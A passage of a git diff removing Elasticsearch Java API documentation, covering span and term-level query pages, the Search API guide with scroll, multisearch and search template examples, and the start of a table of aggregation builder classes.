Script type: either `ScriptType.FILE`, `ScriptType.INLINE` or `ScriptType.INDEXED` -<2> Scripting engine -<3> Script name -<4> Parameters as a `Map` diff --git a/docs/java-api/query-dsl/simple-query-string-query.asciidoc b/docs/java-api/query-dsl/simple-query-string-query.asciidoc deleted file mode 100644 index c3b32ecd1cb..00000000000 --- a/docs/java-api/query-dsl/simple-query-string-query.asciidoc +++ /dev/null @@ -1,9 +0,0 @@ -[[java-query-dsl-simple-query-string-query]] -==== Simple Query String Query - -See {ref}/query-dsl-simple-query-string-query.html[Simple Query String Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[simple_query_string] --------------------------------------------------- diff --git a/docs/java-api/query-dsl/span-containing-query.asciidoc b/docs/java-api/query-dsl/span-containing-query.asciidoc deleted file mode 100644 index 173e26952c2..00000000000 --- a/docs/java-api/query-dsl/span-containing-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-span-containing-query]] -==== Span Containing Query - -See {ref}/query-dsl-span-containing-query.html[Span Containing Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[span_containing] --------------------------------------------------- -<1> `big` part -<2> `little` part diff --git a/docs/java-api/query-dsl/span-first-query.asciidoc b/docs/java-api/query-dsl/span-first-query.asciidoc deleted file mode 100644 index d02c164754c..00000000000 --- a/docs/java-api/query-dsl/span-first-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-span-first-query]] -==== Span First Query - -See {ref}/query-dsl-span-first-query.html[Span First Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[span_first] --------------------------------------------------- -<1> query -<2> max end position diff --git a/docs/java-api/query-dsl/span-multi-term-query.asciidoc b/docs/java-api/query-dsl/span-multi-term-query.asciidoc deleted file mode 100644 index eea00f61fe7..00000000000 --- a/docs/java-api/query-dsl/span-multi-term-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ 
-[[java-query-dsl-span-multi-term-query]] -==== Span Multi Term Query - -See {ref}/query-dsl-span-multi-term-query.html[Span Multi Term Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[span_multi] --------------------------------------------------- -<1> Can be any builder extending the `MultiTermQueryBuilder` class. For example: `FuzzyQueryBuilder`, -`PrefixQueryBuilder`, `RangeQueryBuilder`, `RegexpQueryBuilder` or `WildcardQueryBuilder`. diff --git a/docs/java-api/query-dsl/span-near-query.asciidoc b/docs/java-api/query-dsl/span-near-query.asciidoc deleted file mode 100644 index 6f4661e34c9..00000000000 --- a/docs/java-api/query-dsl/span-near-query.asciidoc +++ /dev/null @@ -1,12 +0,0 @@ -[[java-query-dsl-span-near-query]] -==== Span Near Query - -See {ref}/query-dsl-span-near-query.html[Span Near Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[span_near] --------------------------------------------------- -<1> span term queries -<2> slop factor: the maximum number of intervening unmatched positions -<3> whether matches are required to be in-order diff --git a/docs/java-api/query-dsl/span-not-query.asciidoc b/docs/java-api/query-dsl/span-not-query.asciidoc deleted file mode 100644 index 001c2ca025e..00000000000 --- a/docs/java-api/query-dsl/span-not-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-span-not-query]] -==== Span Not Query - -See {ref}/query-dsl-span-not-query.html[Span Not Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[span_not] --------------------------------------------------- -<1> span query whose matches are filtered -<2> span query whose matches must not overlap those returned diff --git a/docs/java-api/query-dsl/span-or-query.asciidoc b/docs/java-api/query-dsl/span-or-query.asciidoc deleted file mode 100644 index 787628b5934..00000000000 --- a/docs/java-api/query-dsl/span-or-query.asciidoc +++ /dev/null @@ -1,10 +0,0 @@ -[[java-query-dsl-span-or-query]] -==== Span Or Query - -See {ref}/query-dsl-span-or-query.html[Span Or Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[span_or] --------------------------------------------------- -<1> span term queries diff --git a/docs/java-api/query-dsl/span-queries.asciidoc b/docs/java-api/query-dsl/span-queries.asciidoc deleted file mode 100644 index 0ccbe30638c..00000000000 --- a/docs/java-api/query-dsl/span-queries.asciidoc +++ /dev/null @@ -1,65 +0,0 @@ -[[java-span-queries]] -=== Span queries - -Span queries are low-level positional queries which provide expert control -over the order and proximity of the specified terms. These are typically used -to implement very specific queries on legal documents or patents. - -Span queries cannot be mixed with non-span queries (with the exception of the `span_multi` query). - -The queries in this group are: - -<>:: - -The equivalent of the <> but for use with -other span queries. - -<>:: - -Wraps a <>, <>, -<>, <>, -<>, or <> query. - -<>:: - -Accepts another span query whose matches must appear within the first N -positions of the field. - -<>:: - -Accepts multiple span queries whose matches must be within the specified distance of each other, and possibly in the same order. 
- -<>:: - -Combines multiple span queries -- returns documents which match any of the -specified queries. - -<>:: - -Wraps another span query, and excludes any documents which match that query. - -<>:: - -Accepts a list of span queries, but only returns those spans which also match a second span query. - -<>:: - -The result from a single span query is returned as long is its span falls -within the spans returned by a list of other span queries. - - -include::span-term-query.asciidoc[] - -include::span-multi-term-query.asciidoc[] - -include::span-first-query.asciidoc[] - -include::span-near-query.asciidoc[] - -include::span-or-query.asciidoc[] - -include::span-not-query.asciidoc[] - -include::span-containing-query.asciidoc[] - -include::span-within-query.asciidoc[] diff --git a/docs/java-api/query-dsl/span-term-query.asciidoc b/docs/java-api/query-dsl/span-term-query.asciidoc deleted file mode 100644 index 2bdf9276515..00000000000 --- a/docs/java-api/query-dsl/span-term-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-span-term-query]] -==== Span Term Query - -See {ref}/query-dsl-span-term-query.html[Span Term Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[span_term] --------------------------------------------------- -<1> field -<2> value diff --git a/docs/java-api/query-dsl/span-within-query.asciidoc b/docs/java-api/query-dsl/span-within-query.asciidoc deleted file mode 100644 index afa527c0b67..00000000000 --- a/docs/java-api/query-dsl/span-within-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-span-within-query]] -==== Span Within Query - -See {ref}/query-dsl-span-within-query.html[Span Within Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[span_within] --------------------------------------------------- -<1> `big` part -<2> `little` part diff --git a/docs/java-api/query-dsl/special-queries.asciidoc b/docs/java-api/query-dsl/special-queries.asciidoc deleted file mode 100644 index bca3bde3b3f..00000000000 --- a/docs/java-api/query-dsl/special-queries.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ -[[java-specialized-queries]] - -=== Specialized queries - -This group contains queries which do not fit into the other groups: - -<>:: - -This query finds documents which are similar to the specified text, document, -or collection of documents. - -<>:: - -This query allows a script to act as a filter. Also see the -<>. - -<>:: - -This query finds percolator queries based on documents. - -<>:: - -A query that accepts other queries as json or yaml string. - -include::mlt-query.asciidoc[] - -include::script-query.asciidoc[] - -include::percolate-query.asciidoc[] - -include::wrapper-query.asciidoc[] diff --git a/docs/java-api/query-dsl/term-level-queries.asciidoc b/docs/java-api/query-dsl/term-level-queries.asciidoc deleted file mode 100644 index e7d5ad4e52b..00000000000 --- a/docs/java-api/query-dsl/term-level-queries.asciidoc +++ /dev/null @@ -1,83 +0,0 @@ -[[java-term-level-queries]] -=== Term level queries - -While the <> will analyze the query -string before executing, the _term-level queries_ operate on the exact terms -that are stored in the inverted index. - -These queries are usually used for structured data like numbers, dates, and -enums, rather than full text fields. Alternatively, they allow you to craft -low-level queries, foregoing the analysis process. 
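To make that distinction concrete, here is a small, illustrative comparison (field names and values are made up, and the `status.keyword` multi-field is assumed to exist) of an exact term lookup versus an analyzed match query:

[source,java]
--------------------------------------------------
import org.elasticsearch.index.query.QueryBuilder;

import static org.elasticsearch.index.query.QueryBuilders.*;

// term: looks up the exact term in the inverted index, with no analysis
QueryBuilder exact = termQuery("status.keyword", "Published");

// match: analyzes the input first, so "Published" and "published" both match
QueryBuilder analyzed = matchQuery("status", "Published");
--------------------------------------------------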
- -The queries in this group are: - -<>:: - - Find documents which contain the exact term specified in the field - specified. - -<>:: - - Find documents which contain any of the exact terms specified in the field - specified. - -<>:: - - Find documents where the field specified contains values (dates, numbers, - or strings) in the range specified. - -<>:: - - Find documents where the field specified contains any non-null value. - -<>:: - - Find documents where the field specified contains terms which being with - the exact prefix specified. - -<>:: - - Find documents where the field specified contains terms which match the - pattern specified, where the pattern supports single character wildcards - (`?`) and multi-character wildcards (`*`) - -<>:: - - Find documents where the field specified contains terms which match the - regular expression specified. - -<>:: - - Find documents where the field specified contains terms which are fuzzily - similar to the specified term. Fuzziness is measured as a - http://en.wikipedia.org/wiki/Damerau%E2%80%93Levenshtein_distance[Levenshtein edit distance] - of 1 or 2. - -<>:: - - Find documents of the specified type. - -<>:: - - Find documents with the specified type and IDs. - - -include::term-query.asciidoc[] - -include::terms-query.asciidoc[] - -include::range-query.asciidoc[] - -include::exists-query.asciidoc[] - -include::prefix-query.asciidoc[] - -include::wildcard-query.asciidoc[] - -include::regexp-query.asciidoc[] - -include::fuzzy-query.asciidoc[] - -include::type-query.asciidoc[] - -include::ids-query.asciidoc[] diff --git a/docs/java-api/query-dsl/term-query.asciidoc b/docs/java-api/query-dsl/term-query.asciidoc deleted file mode 100644 index 7c8549dbed4..00000000000 --- a/docs/java-api/query-dsl/term-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-term-query]] -==== Term Query - -See {ref}/query-dsl-term-query.html[Term Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[term] --------------------------------------------------- -<1> field -<2> text diff --git a/docs/java-api/query-dsl/terms-query.asciidoc b/docs/java-api/query-dsl/terms-query.asciidoc deleted file mode 100644 index 587968ba18e..00000000000 --- a/docs/java-api/query-dsl/terms-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-terms-query]] -==== Terms Query - -See {ref}/query-dsl-terms-query.html[Terms Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[terms] --------------------------------------------------- -<1> field -<2> values diff --git a/docs/java-api/query-dsl/type-query.asciidoc b/docs/java-api/query-dsl/type-query.asciidoc deleted file mode 100644 index 160deedb9ea..00000000000 --- a/docs/java-api/query-dsl/type-query.asciidoc +++ /dev/null @@ -1,15 +0,0 @@ -[[java-query-dsl-type-query]] -==== Type Query - -deprecated[7.0.0] - -Types are being removed, prefer filtering on a field instead. For -more information, see {ref}/removal-of-types.html[Removal of mapping types]. 
- -See {ref}/query-dsl-type-query.html[Type Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[type] --------------------------------------------------- -<1> type diff --git a/docs/java-api/query-dsl/wildcard-query.asciidoc b/docs/java-api/query-dsl/wildcard-query.asciidoc deleted file mode 100644 index f9ace822aac..00000000000 --- a/docs/java-api/query-dsl/wildcard-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-wildcard-query]] -==== Wildcard Query - -See {ref}/query-dsl-wildcard-query.html[Wildcard Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[wildcard] --------------------------------------------------- -<1> field -<2> wildcard expression diff --git a/docs/java-api/query-dsl/wrapper-query.asciidoc b/docs/java-api/query-dsl/wrapper-query.asciidoc deleted file mode 100644 index 3bdf3cc69d3..00000000000 --- a/docs/java-api/query-dsl/wrapper-query.asciidoc +++ /dev/null @@ -1,11 +0,0 @@ -[[java-query-dsl-wrapper-query]] -==== Wrapper Query - -See {ref}/query-dsl-wrapper-query.html[Wrapper Query] - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{query-dsl-test}[wrapper] --------------------------------------------------- - -<1> query defined as query builder diff --git a/docs/java-api/search.asciidoc b/docs/java-api/search.asciidoc deleted file mode 100644 index 39b451fe266..00000000000 --- a/docs/java-api/search.asciidoc +++ /dev/null @@ -1,250 +0,0 @@ -[[java-search]] -== Search API - -The search API allows one to execute a search query and get back search hits -that match the query. It can be executed across one or more indices and -across one or more types. The query can be provided using the <>. -The body of the search request is built using the `SearchSourceBuilder`. Here is an example: - -[source,java] --------------------------------------------------- -import org.elasticsearch.action.search.SearchResponse; -import org.elasticsearch.action.search.SearchType; -import org.elasticsearch.index.query.QueryBuilders.*; --------------------------------------------------- - -[source,java] --------------------------------------------------- -SearchResponse response = client.prepareSearch("index1", "index2") - .setSearchType(SearchType.DFS_QUERY_THEN_FETCH) - .setQuery(QueryBuilders.termQuery("multi", "test")) // Query - .setPostFilter(QueryBuilders.rangeQuery("age").from(12).to(18)) // Filter - .setFrom(0).setSize(60).setExplain(true) - .get(); --------------------------------------------------- - -Note that all parameters are optional. Here is the smallest search call -you can write: - -[source,java] --------------------------------------------------- -// MatchAll on the whole cluster with all default options -SearchResponse response = client.prepareSearch().get(); --------------------------------------------------- - -NOTE: Although the Java API defines the additional search types QUERY_AND_FETCH and - DFS_QUERY_AND_FETCH, these modes are internal optimizations and should not - be specified explicitly by users of the API. - -For more information on the search operation, check out the REST -{ref}/search.html[search] docs. - - -[[java-search-scrolling]] -=== Using scrolls in Java - -Read the {ref}/search-request-body.html#request-body-search-scroll[scroll documentation] -first! 
- -[source,java] --------------------------------------------------- -import static org.elasticsearch.index.query.QueryBuilders.*; - -QueryBuilder qb = termQuery("multi", "test"); - -SearchResponse scrollResp = client.prepareSearch(test) - .addSort(FieldSortBuilder.DOC_FIELD_NAME, SortOrder.ASC) - .setScroll(new TimeValue(60000)) - .setQuery(qb) - .setSize(100).get(); //max of 100 hits will be returned for each scroll -//Scroll until no hits are returned -do { - for (SearchHit hit : scrollResp.getHits().getHits()) { - //Handle the hit... - } - - scrollResp = client.prepareSearchScroll(scrollResp.getScrollId()).setScroll(new TimeValue(60000)).execute().actionGet(); -} while(scrollResp.getHits().getHits().length != 0); // Zero hits mark the end of the scroll and the while loop. --------------------------------------------------- - -[[java-search-msearch]] -=== MultiSearch API - -See {ref}/search-multi-search.html[MultiSearch API Query] -documentation - -[source,java] --------------------------------------------------- -SearchRequestBuilder srb1 = client - .prepareSearch().setQuery(QueryBuilders.queryStringQuery("elasticsearch")).setSize(1); -SearchRequestBuilder srb2 = client - .prepareSearch().setQuery(QueryBuilders.matchQuery("name", "kimchy")).setSize(1); - -MultiSearchResponse sr = client.prepareMultiSearch() - .add(srb1) - .add(srb2) - .get(); - -// You will get all individual responses from MultiSearchResponse#getResponses() -long nbHits = 0; -for (MultiSearchResponse.Item item : sr.getResponses()) { - SearchResponse response = item.getResponse(); - nbHits += response.getHits().getTotalHits().value; -} --------------------------------------------------- - - -[[java-search-aggs]] -=== Using Aggregations - -The following code shows how to add two aggregations within your search: - -[source,java] --------------------------------------------------- -SearchResponse sr = client.prepareSearch() - .setQuery(QueryBuilders.matchAllQuery()) - .addAggregation( - AggregationBuilders.terms("agg1").field("field") - ) - .addAggregation( - AggregationBuilders.dateHistogram("agg2") - .field("birth") - .calendarInterval(DateHistogramInterval.YEAR) - ) - .get(); - -// Get your facet results -Terms agg1 = sr.getAggregations().get("agg1"); -Histogram agg2 = sr.getAggregations().get("agg2"); --------------------------------------------------- - -See <> -documentation for details. - - -[[java-search-terminate-after]] -=== Terminate After - -The maximum number of documents to collect for each shard, upon reaching which the query execution will terminate early. -If set, you will be able to check if the operation terminated early by asking for `isTerminatedEarly()` in the -`SearchResponse` object: - -[source,java] --------------------------------------------------- -SearchResponse sr = client.prepareSearch(INDEX) - .setTerminateAfter(1000) <1> - .get(); - -if (sr.isTerminatedEarly()) { - // We finished early -} --------------------------------------------------- -<1> Finish after 1000 docs - -[[java-search-template]] -=== Search Template - -See {ref}/search-template.html[Search Template] documentation - -Define your template parameters as a `Map`: - -[source,java] --------------------------------------------------- -Map template_params = new HashMap<>(); -template_params.put("param_gender", "male"); --------------------------------------------------- - -You can use your stored search templates in `config/scripts`. 
-For example, if you have a file named `config/scripts/template_gender.mustache` containing: - -[source,js] --------------------------------------------------- -{ - "query" : { - "match" : { - "gender" : "{{param_gender}}" - } - } -} --------------------------------------------------- -// NOTCONSOLE - -Create your search template request: - -[source,java] --------------------------------------------------- -SearchResponse sr = new SearchTemplateRequestBuilder(client) - .setScript("template_gender") <1> - .setScriptType(ScriptService.ScriptType.FILE) <2> - .setScriptParams(template_params) <3> - .setRequest(new SearchRequest()) <4> - .get() <5> - .getResponse(); <6> --------------------------------------------------- -<1> template name -<2> template stored on disk in `gender_template.mustache` -<3> parameters -<4> set the execution context (ie. define the index name here) -<5> execute and get the template response -<6> get from the template response the search response itself - -You can also store your template in the cluster state: - -[source,java] --------------------------------------------------- -client.admin().cluster().preparePutStoredScript() - .setScriptLang("mustache") - .setId("template_gender") - .setSource(new BytesArray( - "{\n" + - " \"query\" : {\n" + - " \"match\" : {\n" + - " \"gender\" : \"{{param_gender}}\"\n" + - " }\n" + - " }\n" + - "}")).get(); --------------------------------------------------- - -To execute a stored templates, use `ScriptService.ScriptType.STORED`: - -[source,java] --------------------------------------------------- -SearchResponse sr = new SearchTemplateRequestBuilder(client) - .setScript("template_gender") <1> - .setScriptType(ScriptType.STORED) <2> - .setScriptParams(template_params) <3> - .setRequest(new SearchRequest()) <4> - .get() <5> - .getResponse(); <6> --------------------------------------------------- -<1> template name -<2> template stored in the cluster state -<3> parameters -<4> set the execution context (ie. define the index name here) -<5> execute and get the template response -<6> get from the template response the search response itself - -You can also execute inline templates: - -[source,java] --------------------------------------------------- -sr = new SearchTemplateRequestBuilder(client) - .setScript("{\n" + <1> - " \"query\" : {\n" + - " \"match\" : {\n" + - " \"gender\" : \"{{param_gender}}\"\n" + - " }\n" + - " }\n" + - "}") - .setScriptType(ScriptType.INLINE) <2> - .setScriptParams(template_params) <3> - .setRequest(new SearchRequest()) <4> - .get() <5> - .getResponse(); <6> --------------------------------------------------- -<1> template's body -<2> template is passed inline -<3> parameters -<4> set the execution context (ie. define the index name here) -<5> execute and get the template response -<6> get from the template response the search response itself diff --git a/docs/java-rest/high-level/aggs-builders.asciidoc b/docs/java-rest/high-level/aggs-builders.asciidoc deleted file mode 100644 index 57c09e4e9b4..00000000000 --- a/docs/java-rest/high-level/aggs-builders.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[[java-rest-high-aggregation-builders]] -=== Building Aggregations - -This page lists all the available aggregations with their corresponding `AggregationBuilder` class name and helper method name in the -`AggregationBuilders` or `PipelineAggregatorBuilders` utility classes. 
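For orientation, the snippet below is a minimal sketch (not taken from the reference tables) of how a builder from this page is typically created through its `AggregationBuilders` helper and attached to a `SearchSourceBuilder`; the aggregation names and field names (`by_genre`, `genre`, `rating`) are invented for illustration:

[source,java]
--------------------------------------------------
// Terms aggregation with a nested average sub-aggregation,
// built via the AggregationBuilders helper methods listed below
TermsAggregationBuilder byGenre = AggregationBuilders.terms("by_genre")
        .field("genre")
        .subAggregation(AggregationBuilders.avg("avg_rating").field("rating"));

// Attach the aggregation to the search source; size(0) skips returning hits
SearchSourceBuilder sourceBuilder = new SearchSourceBuilder()
        .size(0)
        .aggregation(byGenre);
--------------------------------------------------

Most rows in the tables that follow work the same way; builders listed with `None` as the helper method are constructed directly instead.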
- -:agg-ref: {elasticsearch-javadoc}/org/elasticsearch/search/aggregations -:parentjoin-ref: {parent-join-client-javadoc}/org/elasticsearch/join/aggregations -:matrixstats-ref: {matrixstats-client-javadoc}/org/elasticsearch/search/aggregations - -==== Metrics Aggregations -[options="header"] -|====== -| Aggregation | AggregationBuilder Class | Method in AggregationBuilders -| {ref}/search-aggregations-metrics-avg-aggregation.html[Avg] | {agg-ref}/metrics/AvgAggregationBuilder.html[AvgAggregationBuilder] | {agg-ref}/AggregationBuilders.html#avg-java.lang.String-[AggregationBuilders.avg()] -| {ref}/search-aggregations-metrics-cardinality-aggregation.html[Cardinality] | {agg-ref}/metrics/CardinalityAggregationBuilder.html[CardinalityAggregationBuilder] | {agg-ref}/AggregationBuilders.html#cardinality-java.lang.String-[AggregationBuilders.cardinality()] -| {ref}/search-aggregations-metrics-extendedstats-aggregation.html[Extended Stats] | {agg-ref}/metrics/ExtendedStatsAggregationBuilder.html[ExtendedStatsAggregationBuilder] | {agg-ref}/AggregationBuilders.html#extendedStats-java.lang.String-[AggregationBuilders.extendedStats()] -| {ref}/search-aggregations-metrics-geobounds-aggregation.html[Geo Bounds] | {agg-ref}/metrics/GeoBoundsAggregationBuilder.html[GeoBoundsAggregationBuilder] | {agg-ref}/AggregationBuilders.html#geoBounds-java.lang.String-[AggregationBuilders.geoBounds()] -| {ref}/search-aggregations-metrics-geocentroid-aggregation.html[Geo Centroid] | {agg-ref}/metrics/GeoCentroidAggregationBuilder.html[GeoCentroidAggregationBuilder] | {agg-ref}/AggregationBuilders.html#geoCentroid-java.lang.String-[AggregationBuilders.geoCentroid()] -| {ref}/search-aggregations-metrics-max-aggregation.html[Max] | {agg-ref}/metrics/MaxAggregationBuilder.html[MaxAggregationBuilder] | {agg-ref}/AggregationBuilders.html#max-java.lang.String-[AggregationBuilders.max()] -| {ref}/search-aggregations-metrics-min-aggregation.html[Min] | {agg-ref}/metrics/MinAggregationBuilder.html[MinAggregationBuilder] | {agg-ref}/AggregationBuilders.html#min-java.lang.String-[AggregationBuilders.min()] -| {ref}/search-aggregations-metrics-percentile-aggregation.html[Percentiles] | {agg-ref}/metrics/PercentilesAggregationBuilder.html[PercentilesAggregationBuilder] | {agg-ref}/AggregationBuilders.html#percentiles-java.lang.String-[AggregationBuilders.percentiles()] -| {ref}/search-aggregations-metrics-percentile-rank-aggregation.html[Percentile Ranks] | {agg-ref}/metrics/PercentileRanksAggregationBuilder.html[PercentileRanksAggregationBuilder] | {agg-ref}/AggregationBuilders.html#percentileRanks-java.lang.String-[AggregationBuilders.percentileRanks()] -| {ref}/search-aggregations-metrics-scripted-metric-aggregation.html[Scripted Metric] | {agg-ref}/metrics/ScriptedMetricAggregationBuilder.html[ScriptedMetricAggregationBuilder] | {agg-ref}/AggregationBuilders.html#scriptedMetric-java.lang.String-[AggregationBuilders.scriptedMetric()] -| {ref}/search-aggregations-metrics-stats-aggregation.html[Stats] | {agg-ref}/metrics/StatsAggregationBuilder.html[StatsAggregationBuilder] | {agg-ref}/AggregationBuilders.html#stats-java.lang.String-[AggregationBuilders.stats()] -| {ref}/search-aggregations-metrics-sum-aggregation.html[Sum] | {agg-ref}/metrics/SumAggregationBuilder.html[SumAggregationBuilder] | {agg-ref}/AggregationBuilders.html#sum-java.lang.String-[AggregationBuilders.sum()] -| {ref}/search-aggregations-metrics-top-hits-aggregation.html[Top hits] | {agg-ref}/metrics/TopHitsAggregationBuilder.html[TopHitsAggregationBuilder] | 
{agg-ref}/AggregationBuilders.html#topHits-java.lang.String-[AggregationBuilders.topHits()] -| {ref}/search-aggregations-metrics-top-metrics.html[Top Metrics] | {javadoc-client}/analytics/TopMetricsAggregationBuilder.html[TopMetricsAggregationBuilder] | None -| {ref}/search-aggregations-metrics-valuecount-aggregation.html[Value Count] | {agg-ref}/metrics/ValueCountAggregationBuilder.html[ValueCountAggregationBuilder] | {agg-ref}/AggregationBuilders.html#count-java.lang.String-[AggregationBuilders.count()] -| {ref}/search-aggregations-metrics-string-stats-aggregation.html[String Stats] | {javadoc-client}/analytics/StringStatsAggregationBuilder.html[StringStatsAggregationBuilder] | None -|====== - -==== Bucket Aggregations -[options="header"] -|====== -| Aggregation | AggregationBuilder Class | Method in AggregationBuilders -| {ref}/search-aggregations-bucket-adjacency-matrix-aggregation.html[Adjacency Matrix] | {agg-ref}/bucket/adjacency/AdjacencyMatrixAggregationBuilder.html[AdjacencyMatrixAggregationBuilder] | {agg-ref}/AggregationBuilders.html#adjacencyMatrix-java.lang.String-java.util.Map-[AggregationBuilders.adjacencyMatrix()] -| {ref}/search-aggregations-bucket-children-aggregation.html[Children] | {parentjoin-ref}/ChildrenAggregationBuilder.html[ChildrenAggregationBuilder] | -| {ref}/search-aggregations-bucket-datehistogram-aggregation.html[Date Histogram] | {agg-ref}/bucket/histogram/DateHistogramAggregationBuilder.html[DateHistogramAggregationBuilder] | {agg-ref}/AggregationBuilders.html#dateHistogram-java.lang.String-[AggregationBuilders.dateHistogram()] -| {ref}/search-aggregations-bucket-daterange-aggregation.html[Date Range] | {agg-ref}/bucket/range/DateRangeAggregationBuilder.html[DateRangeAggregationBuilder] | {agg-ref}/AggregationBuilders.html#dateRange-java.lang.String-[AggregationBuilders.dateRange()] -| {ref}/search-aggregations-bucket-diversified-sampler-aggregation.html[Diversified Sampler] | {agg-ref}/bucket/sampler/DiversifiedAggregationBuilder.html[DiversifiedAggregationBuilder] | {agg-ref}/AggregationBuilders.html#diversifiedSampler-java.lang.String-[AggregationBuilders.diversifiedSampler()] -| {ref}/search-aggregations-bucket-filter-aggregation.html[Filter] | {agg-ref}/bucket/filter/FilterAggregationBuilder.html[FilterAggregationBuilder] | {agg-ref}/AggregationBuilders.html#filter-java.lang.String-org.elasticsearch.index.query.QueryBuilder-[AggregationBuilders.filter()] -| {ref}/search-aggregations-bucket-filters-aggregation.html[Filters] | {agg-ref}/bucket/filters/FiltersAggregationBuilder.html[FiltersAggregationBuilder] | {agg-ref}/AggregationBuilders.html#filters-java.lang.String-org.elasticsearch.index.query.QueryBuilder...-[AggregationBuilders.filters()] -| {ref}/search-aggregations-bucket-geodistance-aggregation.html[Geo Distance] | {agg-ref}/bucket/range/GeoDistanceAggregationBuilder.html[GeoDistanceAggregationBuilder] | {agg-ref}/AggregationBuilders.html#geoDistance-java.lang.String-org.elasticsearch.common.geo.GeoPoint-[AggregationBuilders.geoDistance()] -| {ref}/search-aggregations-bucket-geohashgrid-aggregation.html[GeoHash Grid] | {agg-ref}/bucket/geogrid/GeoGridAggregationBuilder.html[GeoGridAggregationBuilder] | {agg-ref}/AggregationBuilders.html#geohashGrid-java.lang.String-[AggregationBuilders.geohashGrid()] -| {ref}/search-aggregations-bucket-global-aggregation.html[Global] | {agg-ref}/bucket/global/GlobalAggregationBuilder.html[GlobalAggregationBuilder] | {agg-ref}/AggregationBuilders.html#global-java.lang.String-[AggregationBuilders.global()] -| 
{ref}/search-aggregations-bucket-histogram-aggregation.html[Histogram] | {agg-ref}/bucket/histogram/HistogramAggregationBuilder.html[HistogramAggregationBuilder] | {agg-ref}/AggregationBuilders.html#histogram-java.lang.String-[AggregationBuilders.histogram()] -| {ref}/search-aggregations-bucket-iprange-aggregation.html[IP Range] | {agg-ref}/bucket/range/IpRangeAggregationBuilder.html[IpRangeAggregationBuilder] | {agg-ref}/AggregationBuilders.html#ipRange-java.lang.String-[AggregationBuilders.ipRange()] -| {ref}/search-aggregations-bucket-missing-aggregation.html[Missing] | {agg-ref}/bucket/missing/MissingAggregationBuilder.html[MissingAggregationBuilder] | {agg-ref}/AggregationBuilders.html#missing-java.lang.String-[AggregationBuilders.missing()] -| {ref}/search-aggregations-bucket-nested-aggregation.html[Nested] | {agg-ref}/bucket/nested/NestedAggregationBuilder.html[NestedAggregationBuilder] | {agg-ref}/AggregationBuilders.html#nested-java.lang.String-java.lang.String-[AggregationBuilders.nested()] -| {ref}/search-aggregations-bucket-range-aggregation.html[Range] | {agg-ref}/bucket/range/RangeAggregationBuilder.html[RangeAggregationBuilder] | {agg-ref}/AggregationBuilders.html#range-java.lang.String-[AggregationBuilders.range()] -| {ref}/search-aggregations-bucket-reverse-nested-aggregation.html[Reverse nested] | {agg-ref}/bucket/nested/ReverseNestedAggregationBuilder.html[ReverseNestedAggregationBuilder] | {agg-ref}/AggregationBuilders.html#reverseNested-java.lang.String-[AggregationBuilders.reverseNested()] -| {ref}/search-aggregations-bucket-sampler-aggregation.html[Sampler] | {agg-ref}/bucket/sampler/SamplerAggregationBuilder.html[SamplerAggregationBuilder] | {agg-ref}/AggregationBuilders.html#sampler-java.lang.String-[AggregationBuilders.sampler()] -| {ref}/search-aggregations-bucket-significantterms-aggregation.html[Significant Terms] | {agg-ref}/bucket/significant/SignificantTermsAggregationBuilder.html[SignificantTermsAggregationBuilder] | {agg-ref}/AggregationBuilders.html#significantTerms-java.lang.String-[AggregationBuilders.significantTerms()] -| {ref}/search-aggregations-bucket-significanttext-aggregation.html[Significant Text] | {agg-ref}/bucket/significant/SignificantTextAggregationBuilder.html[SignificantTextAggregationBuilder] | {agg-ref}/AggregationBuilders.html#significantText-java.lang.String-java.lang.String-[AggregationBuilders.significantText()] -| {ref}/search-aggregations-bucket-terms-aggregation.html[Terms] | {agg-ref}/bucket/terms/TermsAggregationBuilder.html[TermsAggregationBuilder] | {agg-ref}/AggregationBuilders.html#terms-java.lang.String-[AggregationBuilders.terms()] -|====== - -==== Pipeline Aggregations -[options="header"] -|====== -| Pipeline on | PipelineAggregationBuilder Class | Method in PipelineAggregatorBuilders -| {ref}/search-aggregations-pipeline-avg-bucket-aggregation.html[Avg Bucket] | {agg-ref}/pipeline/AvgBucketPipelineAggregationBuilder.html[AvgBucketPipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#avgBucket-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.avgBucket()] -| {ref}/search-aggregations-pipeline-derivative-aggregation.html[Derivative] | {agg-ref}/pipeline/DerivativePipelineAggregationBuilder.html[DerivativePipelineAggregationBuilder] | {agg-ref}/PipelineAggregatorBuilders.html#derivative-java.lang.String-java.lang.String-[PipelineAggregatorBuilders.derivative()] -| 